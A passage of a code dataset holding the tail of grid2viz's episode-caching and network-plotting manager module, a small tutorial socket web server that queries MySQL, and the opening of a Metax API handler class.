[episode.observations[timestep].line_ex_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs += [episode.observations[timestep].line_or_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs = np.unique(line_subs)\n\n area_color= i_zone % n_colors\n fig = add_alarm_area_plotly(line_subs, graph, fig, color=light_colors_plotly[area_color])\n\n return fig\n\n\ndef make_network_agent_overview(episode):\n graph = make_network(episode)\n\n # modified_lines = actions_model.get_modified_lines(episode)\n # line_values = [None] * episode.n_lines\n # for line in modified_lines.index:\n # line_values[np.where(episode.line_names == line)[0][0]] = line\n\n lines_attacked = list(\n episode.attacks_data_table[\"id_lines\"][\n episode.attacks_data_table.attack\n ].unique()\n )\n lines_overflowed_ids = list(\n itertools.chain.from_iterable(episode.total_overflow_ts.line_ids)\n )\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[0]\n\n # having a rho with value 1.0 gives us a red line while 0.7 gives us an orange line and 0.3 a blue line\n rho_to_color = np.array(\n [\n float(0.6) if line in lines_attacked else float(0.3)\n for line in episode.line_names\n ]\n )\n rho_to_color[lines_overflowed_ids] = 1.0\n line_status_colored = np.array(\n [False if line in lines_attacked else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n # network_graph = make_network(episode).plot_info(\n # line_values=[ line if line in lines_attacked else None for line in episode.line_names]\n # #coloring=\"line\"\n # )\n # 
)\n fig = graph.plot_obs(obs_colored, line_info=None, gen_info=None, load_info=None)\n\n ##########\n # We color subs where we had actions\n sub_name_modified = list(\n itertools.chain.from_iterable(episode.action_data_table.subs_modified)\n )\n sub_id_modified = set([int(str.split(\"_\")[1]) for str in sub_name_modified])\n fig = add_substation_color_plotly(sub_id_modified, graph, fig)\n\n return fig\n\n\ndef make_network_scenario_overview(episode,timestep=0):\n max_loads = (\n episode.load[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n max_gens = (\n episode.production[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n lines_in_maintenance = list(\n episode.maintenances[\"line_name\"][episode.maintenances.value == 1].unique()\n )\n\n graph = make_network_matplotlib(episode)\n\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[timestep]\n\n # having a rho with value 0.1 gives us a blue line while 0.5 gives us an orange line\n # line in maintenance would display as dashed lines\n rho_to_color = np.array(\n [\n float(0.0) if line in lines_in_maintenance else float(0.4)\n for line in episode.line_names\n ]\n )\n line_status_colored = np.array(\n [False if line in lines_in_maintenance else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n obs_colored.load_p = np.array(max_loads.value)\n obs_colored.gen_p = np.array(max_gens.value)\n\n network_graph = graph.plot_obs(obs_colored, line_info=None)\n # network_graph=graph.plot_info(\n # #observation=episode.observations[0],\n # load_values=max_loads.values.flatten(),\n # load_unit=\"MW\",\n # gen_values=max_gens.values.flatten(),\n # gen_unit=\"MW\"\n # #line_values=[ 1 if line in lines_in_maintenance else 0 for line in episode.line_names],\n # #coloring=\"line\"\n # )\n\n return network_graph\n\n\nstore = {}\n\n\ndef make_episode(agent, episode_name,with_reboot=False):\n \"\"\"\n Load episode from cache. 
If not already in, compute episode data\n and save it in cache.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n episode=get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n episode = get_from_fs_cache(episode_name, agent)\n save_in_ram_cache(episode_name, agent, episode)\n #to see evolution of ram footprint\n #from guppy import hpy\n #h = hpy()\n #print(h.heap())\n else:\n episode = compute_episode(episode_name, agent,with_reboot)\n save_in_ram_cache(episode_name, agent, episode)\n\n if(with_reboot and \"reboot\" not in dir(episode)):\n #in that case we need to reload the episode from episode data object\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode.decorate_with_reboot(episode_data)\n save_in_ram_cache(episode_name, agent, episode)\n\n return episode\n\n\ndef make_episode_without_decorate(agent, episode_name,save=False):\n \"\"\"\n Load episode from cache without decorating with the EpisodeData attributes\n This is needed to use multiprocessing which pickles/unpickles the results.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data (without EpisodeData attributes), EpisodeData instance\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n if save:\n return None\n return get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n if save:\n return None\n beg = time.time()\n episode_analytics=get_from_fs_cache(episode_name, agent)\n return episode_analytics\n else:\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n if episode_data is not None:\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if save:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n return None # to avoid pickling problems in multiprocessing\n return episode_analytics\n else:\n return None\n\n\ndef clear_fs_cache():\n os.rmdir(cache_dir)\n\n\ndef is_in_fs_cache(episode_name, agent):\n dill_path=get_fs_cached_file(episode_name, agent)\n is_in_fs_cache = os.path.isfile(dill_path) or os.path.isfile(dill_path+\".bz\")\n return is_in_fs_cache\n\n\ndef get_fs_cached_file(episode_name, agent):\n episode_dir = os.path.join(cache_dir, episode_name)\n if not os.path.exists(episode_dir):\n os.makedirs(episode_dir,exist_ok=True)\n return os.path.join(episode_dir, agent + \".dill\")\n\ndef save_in_fs_cache(episode_name, agent, episode):\n path = get_fs_cached_file(episode_name, agent)\n\n #####\n #to assess size of objects\n\n #from pympler import asizeof\n #total_size=asizeof.asizeof(episode)\n #for key,value in vars(episode).items():\n # print(key)\n # print(asizeof.asizeof(value))\n # print(int(asizeof.asizeof(value)/total_size*100))\n\n #import bz2\n #import zipfile\n #bz2.BZ2File('bz2_test.pbz2', 'wb') as f:\n with gzip.open(path+\".bz\", \"wb\") as f:\n #with zipfile.ZipFile.write(path+\".zip\") as f:\n #with open(path, \"wb\") as f:\n #dill.dump(episode, f, protocol=4)\n pickle.dump(episode, f, protocol=4)\n\n\n\ndef get_from_fs_cache(episode_name, agent):\n beg = time.time()\n path = get_fs_cached_file(episode_name, agent)\n print(f\"Loading from filesystem cache agent {agent} on scenario {episode_name}...\")\n\n start = time.time()\n\n if(os.path.exists(path + \".bz\")):\n\n with gzip.open(path + \".bz\", \"rb\") as f:\n # with 
zipfile.ZipFile.open(path + \".zip\") as f:\n print(path)\n episode_analytics=pickle.load(f)\n else:\n with open(path, \"rb\") as f:\n episode_analytics = pickle.load(f)\n\n ######\n #add observation_space only to decorate as it could not be saved in pickle\n agent_path = os.path.join(agents_dir, agent)\n episode_analytics.decorate_obs_act_spaces(agent_path)\n\n\n ##########\n ##Warning for compatibility with older cache version:\n if(\"observations\" not in dir(episode_analytics)):\n print(\"WARNING: the cache management has been updated in grid2viz 1.3.1 for faster loading. \"\n \"You should delete the old _cache folder and recompute it with the latest grid2viz version\")\n episode_analytics.optimize_memory_footprint(opt_obs_act=True)# this adds about 25% loading-time overhead,\n # in particular when resetting observations and actions, which only brings a 10% size decrease\n\n #episode_analytics.decorate(episode_data)\n #episode_analytics=decorate(episode_analytics,episode_data)\n\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from filesystem cache in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef compute_episode(episode_name, agent,with_reboot=False):\n print(f\"Loading from logs agent {agent} on scenario {episode_name}...\")\n beg = time.time()\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if with_reboot:\n episode_analytics.decorate_with_reboot(episode_data)\n else:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n episode_analytics.decorate_obs_act_spaces(os.path.join(agents_dir, agent))\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from logs in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef retrieve_episode_from_disk(episode_name, agent):\n path = os.path.join(agents_dir, agent)\n episode_path = os.path.abspath(os.path.join(path, episode_name))\n if os.path.isdir(episode_path):\n episode_data = EpisodeData.from_disk(path, episode_name)\n return episode_data\n else:\n return None\n\n\ndef is_in_ram_cache(episode_name, agent):\n return make_ram_cache_id(episode_name, agent) in store\n\n\ndef save_in_ram_cache(episode_name, agent, episode):\n store[make_ram_cache_id(episode_name, agent)] = episode\n\n\ndef get_from_ram_cache(episode_name, agent):\n return store[make_ram_cache_id(episode_name, agent)]\n\n\ndef make_ram_cache_id(episode_name, agent):\n return agent + episode_name\n\n\ndef check_all_tree_and_get_meta_and_best(base_dir, agents):\n best_agents = {}\n meta_json = {}\n scenarios = set()\n survival_dic = {}\n attention_dic = {}\n\n for agent in agents:\n survival_dic_agent = {}\n attention_dic_agent = {}\n for scenario_name in os.listdir(os.path.join(base_dir, agent)):\n\n scenario_folder = os.path.join(base_dir, agent, scenario_name)\n if not os.path.isdir(scenario_folder):\n continue\n with open(os.path.join(scenario_folder, \"episode_meta.json\")) as f:\n episode_meta = json.load(fp=f)\n meta_json[scenario_name] = episode_meta\n\n survival_dic_agent[scenario_name] = int(\n int(episode_meta[\"nb_timestep_played\"])\n * 100\n / int(episode_meta[\"chronics_max_timestep\"])\n )\n scenarios.add(scenario_name)\n\n if scenario_name not in best_agents:\n best_agents[scenario_name] = {\n \"value\": -1,\n \"agent\": None,\n \"out_of\": 0,\n \"cum_reward\": -1,\n }\n condition_to_update_best_agent = 
best_agents[scenario_name][\n \"value\"\n ] < episode_meta[\"nb_timestep_played\"] or (\n best_agents[scenario_name][\"value\"]\n == episode_meta[\"nb_timestep_played\"]\n and best_agents[scenario_name][\"cum_reward\"]\n < episode_meta[\"cumulative_reward\"]\n )\n if condition_to_update_best_agent:\n best_agents[scenario_name][\"value\"] = episode_meta[\n \"nb_timestep_played\"\n ]\n best_agents[scenario_name][\"agent\"] = agent\n best_agents[scenario_name][\"cum_reward\"] = episode_meta[\n \"cumulative_reward\"\n ]\n\n best_agents[scenario_name][\"out_of\"] = (\n best_agents[scenario_name][\"out_of\"] + 1\n )\n other_reward_json_path=os.path.join(scenario_folder, \"other_rewards.json\")\n if os.path.exists(other_reward_json_path):\n with open(other_reward_json_path) as f:\n other_reward_meta = json.load(fp=f)\n last_step_rewards=other_reward_meta[len(other_reward_meta) - 1]\n if 'attention_score' in last_step_rewards.keys():\n attention_dic_agent[scenario_name] = last_step_rewards['attention_score']\n f.close()\n\n\n survival_dic[agent] = survival_dic_agent\n attention_dic[agent] = attention_dic_agent\n\n scenarios=list(scenarios)#instead of set, to avoid type errors when using pandas for instance\n survival_df = pd.DataFrame(columns=agents, index=scenarios)\n attention_df = pd.DataFrame(columns=agents, index=scenarios)#, dtype=np.int64)\n for agent in agents:\n survival_dic_agent = survival_dic[agent]\n attention_dic_agent = attention_dic[agent]\n for (scenario, survival_time) in survival_dic_agent.items():\n survival_df.loc[scenario][agent] = survival_time\n if len(attention_dic_agent) != 0:\n for (scenario, attention_score) in attention_dic_agent.items():\n attention_df.loc[scenario][agent] = np.round(attention_score,2)\n\n survival_df = survival_df.fillna(-1) # To be able to cast as int below.\n survival_df = survival_df.astype(int)\n\n return meta_json, best_agents, survival_df, attention_df\n\ndef make_cache(scenarios,agents,n_cores,cache_dir,agent_selection=None):\n\n if(agent_selection is not None):\n agents=[agent for agent in agents if agent in agent_selection]\n\n from pathos.multiprocessing import ProcessPool\n\n if not os.path.exists(cache_dir):\n print(\"Starting Multiprocessing for reading the best agent of each scenario\")\n\n # TODO: not all agents have necessarily run on exactly the same scenarios\n # Avoid an error if an agent has not run on a given scenario\n agent_scenario_list = [\n (agent, scenario) for agent in agents for scenario in scenarios\n ]\n\n agents_data = []\n if n_cores == 1: # no multiprocessing; useful for debugging if needed\n i = 0\n for agent_scenario in agent_scenario_list:\n agents_data.append(\n make_episode_without_decorate(agent_scenario[0], agent_scenario[1],save=True)\n )\n i += 1\n else:\n pool = ProcessPool(n_cores)\n list(\n pool.imap(\n make_episode_without_decorate,\n [agent_scenario[0] for agent_scenario in agent_scenario_list], # agents\n [agent_scenario[1] for agent_scenario in agent_scenario_list],\n [True for agent_scenario in agent_scenario_list],\n )\n ) # scenarios #we go over all agents and all scenarios for each agent\n pool.close()\n print(\"Multiprocessing done\")\n\n\n\"\"\"\nInitialisation routine\n\"\"\"\n\"\"\" Parsing of config file\"\"\"\nif \"GRID2VIZ_ROOT\" not in os.environ:\n #get grid2viz package path\n pkg_root_dir = os.getcwd()#os.path.dirname(os.path.abspath((os.path.join(os.path.abspath(__file__), os.pardir))))\n os.environ[\"GRID2VIZ_ROOT\"] = pkg_root_dir\n path_cfg = 
os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\nelse:\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\n\nparser = configparser.ConfigParser()\nprint(\n Fore.BLUE + Style.BRIGHT + \"The config file used is located at: {}\".format(path_cfg)\n)\nparser.read(path_cfg)\n\nagents_dir = parser.get(\"DEFAULT\", \"agents_dir\")\nprint(Fore.BLUE + \"Agents data used is located at: {}\".format(agents_dir))\ncache_dir = os.path.join(agents_dir, \"_cache\")\n\"\"\"Parsing of agent folder tree\"\"\"\nagents = sorted(\n [\n file\n for file in os.listdir(agents_dir)\n if os.path.isdir(os.path.join(agents_dir, file)) and not file.startswith(\"_\")\n ]\n)\nmeta_json, best_agents, survival_df, attention_df = check_all_tree_and_get_meta_and_best(\n agents_dir, agents\n)\nscenarios = []\nscenarios_agent = {}\nagent_scenario = {}\n\ntry:\n n_cores = int(parser.get(\"DEFAULT\", \"n_cores\"))\nexcept configparser.NoOptionError:\n n_cores = 1\n\nfor agent in agents:\n scen_path = os.path.join(agents_dir, agent)\n scens = [\n file\n for file in os.listdir(scen_path)\n if os.path.isdir(os.path.join(scen_path, file))\n ]\n scenarios_agent[agent] = scens\n for scen in scens:\n if scen not in agent_scenario:\n agent_scenario[scen] = []\n if agent not in agent_scenario[scen]:\n agent_scenario[scen].append(agent)\n scenarios = scenarios + scens\n\nscenarios = set(scenarios)\nenv_path = parser.get(\"DEFAULT\", \"env_dir\")\n# Create a .grid2viz directory in the user home directory\ngrid2viz_home_directory = Path.home() / \".grid2viz\"\ngrid2viz_home_directory.mkdir(parents=False, exist_ok=True)\n", "repo_name": "rte-france/grid2viz", "sub_path": "grid2viz/src/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 26555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.spatial.ConvexHull", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 83, "usage_type": "name"}, {"api_name": "grid2op.PlotGrid.PlotPlotly", "line_number": 105, "usage_type": "call"}, {"api_name": "grid2op.PlotGrid.PlotMatplot", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.colors.sequential", "line_number": 171, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 171, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 172, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 172, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 173, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 180, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 208, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 208, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 223, "usage_type": "call"}, {"api_name": 
"itertools.chain", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 261, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 283, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 283, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 315, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 363, "usage_type": "call"}, {"api_name": "time.time", "line_number": 429, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 435, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 477, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 481, "usage_type": "call"}, {"api_name": "time.time", "line_number": 486, "usage_type": "call"}, {"api_name": "time.time", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 492, "usage_type": "call"}, {"api_name": "os.path", "line_number": 492, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 494, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 497, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 519, "usage_type": "call"}, {"api_name": "time.time", "line_number": 528, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, 
{"api_name": "grid2op.Episode.EpisodeData.from_disk", "line_number": 548, "usage_type": "call"}, {"api_name": "grid2op.Episode.EpisodeData", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 585, "usage_type": "call"}, {"api_name": "os.path", "line_number": 585, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 626, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 646, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 660, "usage_type": "call"}, {"api_name": "os.path", "line_number": 660, "usage_type": "attribute"}, {"api_name": "pathos.multiprocessing.ProcessPool", "line_number": 678, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 695, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 697, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 701, "usage_type": "call"}, {"api_name": "os.path", "line_number": 701, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 701, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 703, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Style.BRIGHT", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 710, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 710, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 711, "usage_type": "call"}, {"api_name": "os.path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 716, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 717, "usage_type": "call"}, {"api_name": "os.path", "line_number": 717, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 717, "usage_type": "call"}, {"api_name": "configparser.NoOptionError", "line_number": 729, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 733, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 733, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 736, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 750, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 750, "usage_type": "name"}]}
+{"seq_id": "6064377675", "text": "\"\"\"\nhttp协议 --> 应用层协议\n浏览器会默认的加上80端口号\n\n# 1. 识别不同的网址 --> 返回不同的页面\n# 2. 能够加载外部的html文件进来\n# 3. 服务器去链接数据库\n# 4. 注册功能 --> 插入一条数据到mysql中\n# 5. 登陆功能 --> 在数据库中查询 在注册的时候插入的账户密码是否匹配\n# 6. 保持登陆 --> cookie 或者 session\n\"\"\"\nimport socket\nimport pymysql\n#tcp和ip协议\nclass WebServer:\n def __init__(self):\n self.ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #重启的时候 不用去改端口号\n self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #绑定ip地址和端口号\n self.ss.bind(('10.2.0.26',10081))\n self.ss.listen(10)\n\n\n def run(self):\n conn,addr = self.ss.accept()\n msg = conn.recv(1024)\n url = self.get_url(msg)\n res = self.url_header(url)\n response_header = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n\" \\\n \"Connection: Closed\\r\\n\\r\\n\"\n\n with open(res,'r') as f:\n response_body = f.read()\n conn.send((response_header+response_body).encode())\n\n mysql_conn = self.mysql_conn()\n\n cursor = mysql_conn.cursor()\n\n sql ='select * from user'\n cursor.execute(sql)\n\n res = mysql_conn.commit()\n\n print(res)\n\n\n\n def url_header(self,url):\n if url == b'/':\n return 'test2.html'\n if url == b'/p1904':\n return 'tset.html'\n\n return '404.html'\n def get_url(self,msg):\n msg_list = msg.split()\n return msg_list[1]\n\n def mysql_conn(self):\n conn = pymysql.connect(\n host='10.2.0.26',\n user ='p1904', password ='p1904_123',\n database ='my_web',\n charset ='utf8')\n\n return conn\n\n\n\nif __name__ == '__main__':\n s = WebServer()\n s.run()\n", "repo_name": "JwangTec/python_resources", "sub_path": "django/web_server.py", "file_name": "web_server.py", "file_ext": "py", "file_size_in_byte": 1905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 17, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 19, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "33461524602", "text": "\"\"\"Class for handling calls to METAX API.\n\nAPI docs https://metax.fairdata.fi/docs/\nSwagger https://metax.fairdata.fi/swagger/v2\n\"\"\"\nimport time\nfrom typing import Any\n\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.client_exceptions import ClientConnectorError, InvalidURL\nfrom yarl import URL\n\nfrom ..conf.conf import metax_config\nfrom ..helpers.logger import LOG\nfrom .metax_mapper import MetaDataMapper, SubjectNotFoundException\nfrom .service_handler import ServiceHandler\n\n\nclass MetaxServiceHandler(ServiceHandler):\n \"\"\"API handler for uploading submitters' metadata to METAX service.\"\"\"\n\n service_name = \"Metax\"\n\n def __init__(self) -> None:\n \"\"\"Define variables and paths.\n\n Define variables and paths used for connecting to Metax API and\n default inputs for Metax Dataset creation.\n\n :param req: HTTP request from calling service\n \"\"\"\n metax_url = URL(metax_config[\"url\"])\n super().__init__(\n base_url=metax_url / metax_config[\"rest_route\"][1:],\n auth=BasicAuth(metax_config[\"username\"], metax_config[\"password\"]),\n )\n\n self.connection_check_url = metax_url\n self.publish_route = metax_url / metax_config[\"publish_route\"][1:]\n\n self.minimal_dataset_template: dict[Any, Any] = {\n \"data_catalog\": metax_config[\"catalog_pid\"],\n \"metadata_provider_org\": \"csc.fi\",\n \"research_dataset\": {\n # submitter given DOI\n \"preferred_identifier\": \"\",\n \"title\": {\"en\": \"\"},\n # study abstract or dataset description\n \"description\": {\"en\": \"\"},\n # default\n \"access_rights\": {\n \"access_type\": {\n \"in_scheme\": \"http://uri.suomi.fi/codelist/fairdata/access_type\",\n \"identifier\": \"http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted\",\n }\n },\n # default\n \"publisher\": {\n \"name\": {\n \"en\": \"CSC Sensitive Data Services for Research\",\n \"fi\": \"CSC:n Arkaluonteisen datan palveluiden aineistokatalogi\",\n },\n \"@type\": \"Organization\",\n },\n },\n }\n\n async def _get(self, metax_id: str) -> dict[str, Any]:\n result: dict[str, Any] = await self._request(method=\"GET\", path=metax_id)\n LOG.info(\"Got metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _post_draft(self, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Post call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"POST\", json_data=json_data, params=\"draft\")\n LOG.info(\"Created Metax draft dataset with ID: %r.\", result[\"identifier\"])\n\n return result\n\n async def _put(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Put call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PUT\", path=metax_id, json_data=json_data)\n LOG.info(\"Metax dataset with ID: %r updated.\", metax_id)\n\n return result\n\n async def _patch(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Patch call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", path=metax_id, json_data=json_data)\n LOG.info(\"Patch completed for metax dataset with ID: %r.\", metax_id)\n\n return result\n\n 
